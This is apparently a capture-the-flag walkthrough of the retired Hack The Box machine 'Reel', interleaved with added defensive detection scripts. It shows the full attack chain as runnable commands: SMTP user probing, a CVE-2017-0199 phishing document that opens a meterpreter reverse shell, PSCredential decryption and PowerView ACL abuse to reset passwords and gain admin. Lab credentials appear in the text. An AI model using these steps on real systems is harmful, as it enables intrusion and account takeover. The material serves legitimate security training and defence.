
Reel

Box details
OS: Windows
Difficulty: Hard
Status: Retired
Release: June 2018
Completed: August 2025

Enumeration

Nmap scan of the target:

$ nmap -sV -sC -PN -p- -oA reel_nmap 10.10.10.77
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 17:06 CEST
Nmap scan report for 10.10.10.77
Host is up (0.028s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18  12:19AM       <DIR>          documents
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open  ssh          OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp    open  smtp?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
|     220 Mail Service ready
|     sequence of commands
|   Hello:
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help:
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions:
|     220 Mail Service ready
|     sequence of commands
|   TerminalServerCookie:
|     220 Mail Service ready
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49159/tcp open  msrpc        Microsoft Windows RPC
...
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-08-02T15:11:56
|_  start_date: 2025-08-02T15:04:42
| smb-os-discovery:
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: REEL
|   NetBIOS computer name: REEL\x00
|   Domain name: HTB.LOCAL
|   Forest name: HTB.LOCAL
|   FQDN: REEL.HTB.LOCAL
|_  System time: 2025-08-02T16:11:55+01:00
|_clock-skew: mean: -19m33s, deviation: 34m36s, median: 25s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

No open UDP ports were found.

The target is running an unsecured public FTP server that can be accessed as an anonymous user:

$ ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||41001|)
125 Data connection already open; Transfer starting.
05-29-18  12:19AM       <DIR>          documents
226 Transfer complete.
ftp> cd documents
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||41003|)
125 Data connection already open; Transfer starting.
05-29-18  12:19AM                 2047 AppLocker.docx
05-28-18  02:01PM                  124 readme.txt
10-31-17  10:13PM                14581 Windows Event Forwarding.docx

Downloaded all three documents to look for anything of interest in them:

readme.txt

please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.

AppLocker.docx

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

Windows Event Forwarding.docx
# get winrm config

winrm get winrm/config


# gpo config

O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)        // add to GPO
Server=http://WEF.HTB.LOCAL:5985/wsman/SubscriptionManager/WEC,Refresh=60   // add to GPO (60 seconds)

on source computer: gpupdate /force

# prereqs

start Windows Remote Management service on source computer
add builtin\network service account to "Event Log Readers" group on collector server

# list subscriptions / export

C:\Windows\system32>wecutil es > subs.txt

# check subscription status

C:\Windows\system32>wecutil gr "Account Currently Disabled"

Subscription: Account Currently Disabled
        RunTimeStatus: Active
        LastError: 0
        EventSources:
                LAPTOP12.HTB.LOCAL
                        RunTimeStatus: Active
                        LastError: 0
                        LastHeartbeatTime: 2017-07-11T13:27:00.920


# change pre-rendering setting in multiple subscriptions

for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events


# export subscriptions to xml

for /F "tokens=*" %i in (subs.txt) DO wecutil gs "%i" /f:xml >> "%i.xml"

# import subscriptions from xml

wecutil cs "Event Log Service Shutdown.xml"
wecutil cs "Event Log was cleared.xml"

# if get error "The locale specific resource for the desired message is not present", change subscriptions to Event format (won't do any harm running the command even if they already are in this format)

1.

for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events

2.

Under Windows Regional Settings, on the Formats tab, change the format to "English (United States)"

# check subscriptions are being created on the source computer

Event Log: /Applications and Services Logs/Microsoft/Windows/Eventlog-ForwardingPlugin/Operational


#### troubleshooting WEF

collector server -> subscription name -> runtime status

gpupdate /force (force checkin, get subscriptions)

check Microsoft/Windows/Eventlog-ForwardingPlugin/Operational for errors

The readme.txt asks for .rtf files to be emailed so that they can be converted to .docx. Given that the target is also running an SMTP server, this likely hints at some kind of phishing attack. A valid email address or username is still needed in order to set up the attack.

Analyzing the metadata in Windows Event Forwarding.docx reveals a possible username:

$ exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number         : 13.25
File Name                       : Windows Event Forwarding.docx
Directory                       : .
File Size                       : 15 kB
File Modification Date/Time     : 2017:10:31 22:13:23+01:00
File Access Date/Time           : 2025:08:02 20:26:33+02:00
File Inode Change Date/Time     : 2025:08:02 20:27:00+02:00
File Permissions                : -rw-rw-r--
File Type                       : DOCX
File Type Extension             : docx
MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
...
Creator                         : nico@megabank.com
Revision Number                 : 4
Create Date                     : 2017:10:31 18:42:00Z
Modify Date                     : 2017:10:31 18:51:00Z
...

Note

The information above can usually also be found in the Document Properties dialog of a word processor like LibreOffice Writer. In this case, however, the document appears to be semi-corrupt: when LibreOffice Writer attempts to repair it, it also strips the metadata containing the author's username.

Before proceeding, it's helpful to verify that the email address found above (nico@megabank.com) is valid. This can be done by connecting to the SMTP server on the target, issuing VRFY or RCPT TO, and checking whether the server confirms that the address exists:

$ telnet 10.10.10.77 25
Trying 10.10.10.77...
Connected to 10.10.10.77.
Escape character is '^]'.
220 Mail Service ready
HELO test.com
250 Hello.
VRFY nico@megabank.com 
502 VRFY disallowed. # (1)
MAIL FROM:<test@test.com>
250 OK
RCPT TO:<nico@megabank.com> # (2)
250 OK
  1. The VRFY method is the simplest to test with, but it's not allowed in the current case.
  2. Attempting to send an email to nico@megabank.com is another method. In this case the server confirms that the address exists. If a non-existent megabank.com address is specified, the server would respond with 550 Unknown user.
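
The RCPT TO probing shown above is exactly what a mail server's logs can reveal from the defender's side: one client issuing VRFY, or many RCPT TO commands that come back 550 for distinct recipients, without ever sending DATA. The following is an added example, not part of the original writeup, and the log line format it parses is an assumption invented for the example (the box's mail service does not expose such logs):

```python
import re
from collections import defaultdict

# Constructed sample of SMTP server log lines (format is an assumption made up for this
# example): one line per client command with the server's reply code.
SAMPLE_LOG = """\
2025-08-02T20:30:01 client=10.10.16.6 cmd=VRFY arg=nico@megabank.com code=502
2025-08-02T20:30:02 client=10.10.16.6 cmd=RCPT arg=nico@megabank.com code=250
2025-08-02T20:30:03 client=10.10.16.6 cmd=RCPT arg=admin@megabank.com code=550
2025-08-02T20:30:03 client=10.10.16.6 cmd=RCPT arg=bob@megabank.com code=550
2025-08-02T20:30:04 client=10.10.16.6 cmd=RCPT arg=alice@megabank.com code=550
2025-08-02T20:30:04 client=10.10.16.6 cmd=RCPT arg=tom@megabank.com code=250
2025-08-02T20:30:05 client=10.10.16.6 cmd=RCPT arg=claire@megabank.com code=250
2025-08-02T20:31:10 client=10.10.20.9 cmd=RCPT arg=nico@megabank.com code=250
2025-08-02T20:31:10 client=10.10.20.9 cmd=DATA arg= code=354
"""

LINE_RE = re.compile(
    r"client=(?P<client>\S+) cmd=(?P<cmd>\S+) arg=(?P<arg>\S*) code=(?P<code>\d{3})"
)


def summarise(log_text):
    """Per-client counts of VRFY attempts and accepted/rejected RCPT TO recipients."""
    stats = defaultdict(
        lambda: {"vrfy": 0, "rcpt_ok": 0, "rcpt_rejected": 0, "rejected_rcpts": []}
    )
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # unparseable line, skip rather than guess
        s = stats[m["client"]]
        cmd, code = m["cmd"].upper(), int(m["code"])
        if cmd == "VRFY":
            s["vrfy"] += 1
        elif cmd == "RCPT":
            if 200 <= code < 300:
                s["rcpt_ok"] += 1
            elif code == 550:  # "550 Unknown user": recipient does not exist
                s["rcpt_rejected"] += 1
                s["rejected_rcpts"].append(m["arg"])
    return dict(stats)


def flag_enumeration(stats, min_rejected=3, min_distinct=3):
    """Clients that used VRFY, or probed several distinct non-existent recipients."""
    flagged = []
    for client, s in stats.items():
        distinct = len(set(s["rejected_rcpts"]))
        if s["vrfy"] or (s["rcpt_rejected"] >= min_rejected and distinct >= min_distinct):
            flagged.append(client)
    return sorted(flagged)


if __name__ == "__main__":
    stats = summarise(SAMPLE_LOG)
    for client in flag_enumeration(stats):
        print(client, stats[client])
```

The thresholds are deliberately low so the constructed sample trips them; on a real relay they would be tuned to the normal rate of typos in recipient addresses, and the rejection ratio per client matters more than the raw count.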

Foothold

The call for RTF documents in readme.txt hints that the target is vulnerable to CVE-2017-0199, a vulnerability in Microsoft Office and WordPad that allows RCE through a malicious document. It can be exploited in several ways, but the general idea is that opening the document triggers an HTTP GET request to an attacker-controlled URL embedded in it. If the URL points to an HTML Application (.hta) file, the code in that file (such as a reverse shell payload) gets executed on the victim host.
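
The mechanism described above leaves recognisable traces in the RTF itself: an embedded OLE object marked for automatic update (\objautlink, \objupdate) whose serialised stream references the URL moniker CLSID and a UTF-16 http:// link. The following triage function is an added example for mail-gateway or incident-response use, not part of the writeup or of any Metasploit code; the sample documents are constructed and contain only those structural markers with filler hex, not a working exploit:

```python
import re

# {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}, the URL moniker CLSID, as it appears
# little-endian inside an OLE stream that has been hex-encoded into \objdata.
URL_MONIKER_CLSID_LE = "e0c9ea79f9bace118c8200aa004ba90b"
# "http://" encoded as UTF-16LE, in the same hex form.
HTTP_UTF16LE_HEX = "68007400740070003a002f002f00"

CONTROL_WORDS = (b"\\objautlink", b"\\objupdate", b"\\objdata", b"\\object")


def triage_rtf(data):
    """Return the indicators found in an RTF blob plus a verdict.

    "suspicious": RTF header, URL moniker present, and either an auto-updating
                  object or an http:// link in the object stream.
    "review":     an embedded OLE object without the URL moniker (ordinary
                  embedded objects land here and deserve a look, not a block).
    "clean":      no OLE object indicators at all.
    """
    indicators = []
    has_header = data.lstrip().startswith(b"{\\rtf")
    if not has_header:
        indicators.append("no-rtf-header")
    lowered = data.lower()
    for cw in CONTROL_WORDS:
        if cw in lowered:
            indicators.append(cw.decode())
    # \objdata hex is usually wrapped across lines; strip whitespace before searching.
    hexblob = re.sub(rb"\s+", b"", lowered)
    has_moniker = URL_MONIKER_CLSID_LE.encode() in hexblob
    has_http = HTTP_UTF16LE_HEX.encode() in hexblob
    if has_moniker:
        indicators.append("url-moniker-clsid")
    if has_http:
        indicators.append("utf16-http-link")
    if has_header and has_moniker and (has_http or "\\objupdate" in indicators):
        verdict = "suspicious"
    elif "\\object" in indicators:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": indicators}


# Constructed samples (not real documents): marker strings around filler hex.
SUSPICIOUS_RTF = (
    b"{\\rtf1\\ansi\\deff0{\\object\\objautlink\\objupdate\\rsltpict{\\*\\objdata "
    + b"01050000020000000b0000004f4c45324c696e6b000000000000000000000a0000\n"
    + b"d0cf11e0a1b11ae1" + b"00" * 16 + b"\n"
    + URL_MONIKER_CLSID_LE.encode() + b"\n"
    + HTTP_UTF16LE_HEX.encode() + b"6500780061006d0070006c0065002e0074006500730074000000\n"
    + b"}}\\par}"
)
BENIGN_RTF = b"{\\rtf1\\ansi\\deff0 Quarterly procedure, please review.\\par}"
EMBEDDED_OBJECT_RTF = b"{\\rtf1\\ansi{\\object\\objemb{\\*\\objdata 0105000002000000}}\\par}"

if __name__ == "__main__":
    for name, blob in (("suspicious", SUSPICIOUS_RTF), ("benign", BENIGN_RTF),
                       ("embedded", EMBEDDED_OBJECT_RTF)):
        print(name, triage_rtf(blob))
```

Whitespace is stripped before the hex search because the hex inside \objdata is routinely line-wrapped, which is also why naive grep-style checks on the raw file miss these documents.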

There is a Metasploit module (windows/fileformat/office_word_hta) for exploiting this vulnerability. The module is almost fully self-contained: it generates the malicious RTF file, sets up a web server for the callback and delivers the reverse shell payload.

Configured the module like so:

msf6 exploit(windows/fileformat/office_word_hta) > options

Module options (exploit/windows/fileformat/office_word_hta):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  document.doc     yes       The file name.
   SRVHOST   10.10.16.6       yes       The local host or network interface to listen
                                         on. This must be an address on the local mac
                                        hine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is
                                        randomly generated)
   URIPATH   default.hta      yes       The URI to use for the HTA file


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, pr
                                        ocess, none)
   LHOST     10.10.16.6       yes       The listen address (an interface may be speci
                                        fied)
   LPORT     4444             yes       The listen port

Once the exploit is launched, the only remaining step is to deliver the malicious file by email using a tool like sendemail:

$ sendemail -f test@megabank.htb -t nico@megabank.htb -u RTF -m "see attached" -a /home/kali/.msf4/local/document.doc -s 10.10.10.77 -v
Aug 02 23:58:02 kali sendemail[1713853]: DEBUG => Connecting to 10.10.10.77:25
Aug 02 23:58:02 kali sendemail[1713853]: DEBUG => My IP address is: 10.10.16.6
Aug 02 23:58:02 kali sendemail[1713853]: SUCCESS => Received:   220 Mail Service ready
Aug 02 23:58:02 kali sendemail[1713853]: INFO => Sending:       EHLO kali.sbox.miso.lan
Aug 02 23:58:02 kali sendemail[1713853]: SUCCESS => Received:   250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
Aug 02 23:58:02 kali sendemail[1713853]: INFO => Sending:       MAIL FROM:<test@megabank.htb>
Aug 02 23:58:02 kali sendemail[1713853]: SUCCESS => Received:   250 OK
Aug 02 23:58:02 kali sendemail[1713853]: INFO => Sending:       RCPT TO:<nico@megabank.htb>
Aug 02 23:58:02 kali sendemail[1713853]: SUCCESS => Received:   250 OK
Aug 02 23:58:02 kali sendemail[1713853]: INFO => Sending:       DATA
Aug 02 23:58:02 kali sendemail[1713853]: SUCCESS => Received:   354 OK, send.
Aug 02 23:58:02 kali sendemail[1713853]: INFO => Sending message body
Aug 02 23:58:02 kali sendemail[1713853]: Setting content-type: text/plain
Aug 02 23:58:02 kali sendemail[1713853]: DEBUG => Sending the attachment [/home/kali/.msf4/local/document.doc]
Aug 02 23:58:02 kali sendemail[1713853]: SUCCESS => Received:   250 Queued (0.062 seconds)
Aug 02 23:58:02 kali sendemail[1713853]: Email was sent successfully!  From: <test@megabank.htb> To: <nico@megabank.htb> Subject: [RTF] Attachment(s): [document.doc] Server: [10.10.10.77:25]

Got the callback in msfconsole after a few moments, with a reverse shell as user nico:

msf6 exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Server started.
[*] Sending stage (177734 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.16.6:4444 -> 10.10.10.77:61700) at 2025-08-02 23:58:19 +0200

msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: HTB\nico

Used the meterpreter shell command to drop into a CMD shell, then navigated to C:\Users\nico\Desktop and got the user flag.

Lateral Movement (Nico → Tom)

There is an additional file on user nico's desktop, cred.xml, that contains a PSCredential object for HTB\Tom:

cred.xml

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
    <TN RefId="0">
    <T>System.Management.Automation.PSCredential</T>
    <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
    <S N="UserName">HTB\Tom</S>
    <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
</Obj>
</Objs>

The PSCredential object can be decrypted from the XML file directly with PowerShell:

c:\Users\nico\Desktop>powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"


UserName       : Tom
Password       : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain         : HTB

Note

A PSCredential exported to XML uses the Windows Data Protection API (DPAPI) to protect the password. As this protection is user and machine specific, the object has to be decrypted by the same user on the same host it was stored on.

Used the password above to log in to the target over SSH as tom.

Lateral Movement (Tom → Claire)

There is a folder on tom's desktop named AD Audit. Inside, there is a note with some findings:

note.txt

Findings:

Surprisingly no AD attack paths from user to Domain Admin (using default shortest path
query).

Maybe we should re-run Cypher query against other groups we've created.

There is also a subfolder named Bloodhound\Ingestors that contains binaries for BloodHound and SharpHound, as well as a file named acls.csv. Presumably this contains the results of the audit mentioned above.

Note

Since the box was released, BloodHound has long since abandoned CSV data files in favor of JSON. Modern versions of BloodHound no longer support CSV, so the ACL data would have to be recollected with a newer ingestor in order to be viewable in a current BloodHound.

Unfortunately, the AppLocker policy in effect on the box prevents running SharpHound.exe, limiting the choice of ingestor to the PowerShell variant. However, as the version of PowerShell present on the box (4.0) is too old to run any of the later versions of the SharpHound ingestor, that option won't work either.

Without delving too deep into BloodHound-legacy and old versions of SharpHound, the simplest alternative in this case is to enumerate using PowerView instead.

The next step is to enumerate what access tom has inside the domain. According to PowerView, tom has a WriteOwner privilege over claire:

PS C:\Users\tom> $sid = Convert-NameToSid tom
PS C:\Users\tom> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

AceType               : AccessAllowed
ObjectDN              : CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL
ActiveDirectoryRights : WriteOwner
OpaqueLength          : 0
ObjectSID             : S-1-5-21-2648318136-3688571242-2924127574-1130
InheritanceFlags      : None
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-2648318136-3688571242-2924127574-1107
AccessMask            : 524288
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed

The privilege can be abused to reset claire's password in three steps:

  1. Take ownership of claire's object as tom:

    PS> Set-DomainObjectOwner -identity claire -OwnerIdentity tom

  2. Give tom permission to change the password on the ACL:

    PS> Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

  3. Use the privilege to reset claire's password:

    1. Store tom's credentials in a PSCredential object:

      PS> $SecPassword = ConvertTo-SecureString '1ts-mag1c!!!' -AsPlainText -Force
      PS> $Cred = New-Object System.Management.Automation.PSCredential('HTB\tom', $SecPassword)

    2. Store the new password for claire as a SecureString:

      PS> $newpass = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

    3. Reset the password:

      PS> Set-DomainUserPassword -Identity claire -AccountPassword $newpass -Credential $Cred -Verbose
      VERBOSE: [Get-PrincipalContext] Using alternate credentials
      VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'claire'
      VERBOSE: [Set-DomainUserPassword] Password for user 'claire' successfully reset

Privilege Escalation (Administrator)

Running PowerView as claire reveals an ACL that gives claire WriteDacl rights on the group Backup_Admins:

PS C:\Users\tom> Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

AceType               : AccessAllowed
ObjectDN              : CN=Backup_Admins,OU=Groups,DC=HTB,DC=LOCAL
ActiveDirectoryRights : ReadProperty, WriteProperty, GenericExecute, WriteDacl
OpaqueLength          : 0
ObjectSID             : S-1-5-21-2648318136-3688571242-2924127574-1135
InheritanceFlags      : ContainerInherit
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-2648318136-3688571242-2924127574-1130
AccessMask            : 393268
AuditFlags            : None
AceFlags              : ContainerInherit
AceQualifier          : AccessAllowed
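
Both PowerView dumps above carry the raw AccessMask next to the rendered ActiveDirectoryRights (524288 for tom's WriteOwner over claire, 393268 for claire's rights over Backup_Admins), and the rendering is the .NET flags enum, which is why ReadControl plus ListChildren shows up collapsed as GenericExecute. The decoder below is an added example for auditing ACL exports such as the acls.csv left on tom's desktop; it is not code from the writeup or from PowerView. The rights table is the public ActiveDirectoryRights enum; the set of "control" rights and the sample ACE list are assumptions made for the example (the two SIDs and masks are taken from the output above, the third ACE is constructed):

```python
# System.DirectoryServices.ActiveDirectoryRights flag values, which PowerView uses
# to render the ActiveDirectoryRights column.
ACTIVE_DIRECTORY_RIGHTS = {
    "CreateChild": 0x1,
    "DeleteChild": 0x2,
    "ListChildren": 0x4,
    "Self": 0x8,
    "ReadProperty": 0x10,
    "WriteProperty": 0x20,
    "DeleteTree": 0x40,
    "ListObject": 0x80,
    "ExtendedRight": 0x100,
    "Delete": 0x10000,
    "ReadControl": 0x20000,
    "GenericExecute": 0x20004,   # ReadControl | ListChildren
    "GenericWrite": 0x20028,     # ReadControl | WriteProperty | Self
    "GenericRead": 0x20094,      # ReadControl | ListChildren | ReadProperty | ListObject
    "WriteDacl": 0x40000,
    "WriteOwner": 0x80000,
    "GenericAll": 0xF01FF,
    "Synchronize": 0x100000,
    "AccessSystemSecurity": 0x1000000,
}

# Rights that let the holder take control of the object rather than just read it
# (assumption for this audit; ExtendedRight is context dependent and is included
# because it covers rights such as password reset when GUIDs are not resolved).
CONTROL_RIGHTS = {"GenericAll", "WriteDacl", "WriteOwner", "GenericWrite", "ExtendedRight"}


def decode_access_mask(mask):
    """Render an AccessMask the way .NET's [Flags] Enum.ToString does: walk the
    named values from largest to smallest, take each one whose bits are all still
    set, then list the chosen names in ascending value order."""
    remaining = mask
    found = []
    for name, value in sorted(ACTIVE_DIRECTORY_RIGHTS.items(),
                              key=lambda kv: kv[1], reverse=True):
        if (remaining & value) == value:
            remaining &= ~value
            found.append((value, name))
    if remaining:
        found.append((remaining, hex(remaining)))  # bits with no named right
    return [name for _, name in sorted(found)]


def find_control_aces(aces, principal_sids):
    """ACEs in which one of the given principals holds a control right over an object."""
    hits = []
    for ace in aces:
        if ace["SecurityIdentifier"] not in principal_sids:
            continue
        rights = decode_access_mask(ace["AccessMask"])
        control = sorted(CONTROL_RIGHTS.intersection(rights))
        if control:
            hits.append({"ObjectDN": ace["ObjectDN"],
                         "SecurityIdentifier": ace["SecurityIdentifier"],
                         "control_rights": control})
    return hits


TOM_SID = "S-1-5-21-2648318136-3688571242-2924127574-1107"
CLAIRE_SID = "S-1-5-21-2648318136-3688571242-2924127574-1130"

# Sample ACE list: first and last are from the PowerView output above, the middle
# one is a constructed read-only ACE that must not be reported.
SAMPLE_ACES = [
    {"ObjectDN": "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL",
     "SecurityIdentifier": TOM_SID, "AccessMask": 524288},
    {"ObjectDN": "CN=Some Share,OU=Example,DC=HTB,DC=LOCAL",
     "SecurityIdentifier": TOM_SID, "AccessMask": 0x20094},
    {"ObjectDN": "CN=Backup_Admins,OU=Groups,DC=HTB,DC=LOCAL",
     "SecurityIdentifier": CLAIRE_SID, "AccessMask": 393268},
]

if __name__ == "__main__":
    for hit in find_control_aces(SAMPLE_ACES, {TOM_SID, CLAIRE_SID}):
        print(hit)
```

Feeding a full ACL export through find_control_aces with the SIDs of low-privileged users is the same question the note in AD Audit was asking of BloodHound, answered without needing the CSV-era ingestor: any hit where a regular user holds WriteOwner or WriteDacl over another principal is a path worth removing or justifying.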

The WriteDacl privilege can be abused to add claire to the Backup_Admins group:

claire@REEL C:\Users\claire>net group backup_admins claire /add
The command completed successfully.

claire@REEL C:\Users\claire>net group backup_admins
Group name     Backup_Admins
Comment

Members

-------------------------------------------------------------------------------
claire                   ranj
The command completed successfully.

As a member of Backup_Admins, claire has access to C:\Users\Administrator:

claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
              HTB\Backup_Admins:(OI)(CI)(F)
              HTB\Administrator:(OI)(CI)(F)
              BUILTIN\Administrators:(OI)(CI)(F)

There is a Backup Scripts folder on Administrator's desktop with the following contents:

claire@REEL C:\Users\Administrator\Desktop>dir "Backup Scripts"
 Volume in drive C has no label.
 Volume Serial Number is CEBA-B613

 Directory of C:\Users\Administrator\Desktop\Backup Scripts

11/02/2017  10:47 PM    <DIR>          .
11/02/2017  10:47 PM    <DIR>          ..
11/04/2017  12:22 AM               845 backup.ps1
11/02/2017  10:37 PM               462 backup1.ps1
11/04/2017  12:21 AM             5,642 BackupScript.ps1
11/02/2017  10:43 PM             2,791 BackupScript.zip
11/04/2017  12:22 AM             1,855 folders-system-state.txt
11/04/2017  12:22 AM               308 test2.ps1.txt
               6 File(s)         11,903 bytes
               2 Dir(s)   4,773,634,048 bytes free

One of the files, BackupScript.ps1, contains clear-text credentials for the Administrator user:

claire@REEL C:\Users\Administrator\Desktop\Backup Scripts>type BackupScript.ps1
# admin password
$password="Cr4ckMeIfYouC4n!"

#Variables, only Change here
$Destination="\\BACKUP03\BACKUP" #Copy the Files to this Location
$Versions="50" #How many of the last Backups you want to keep
...

Used the password above to connect to the target over SSH as Administrator and get the root flag.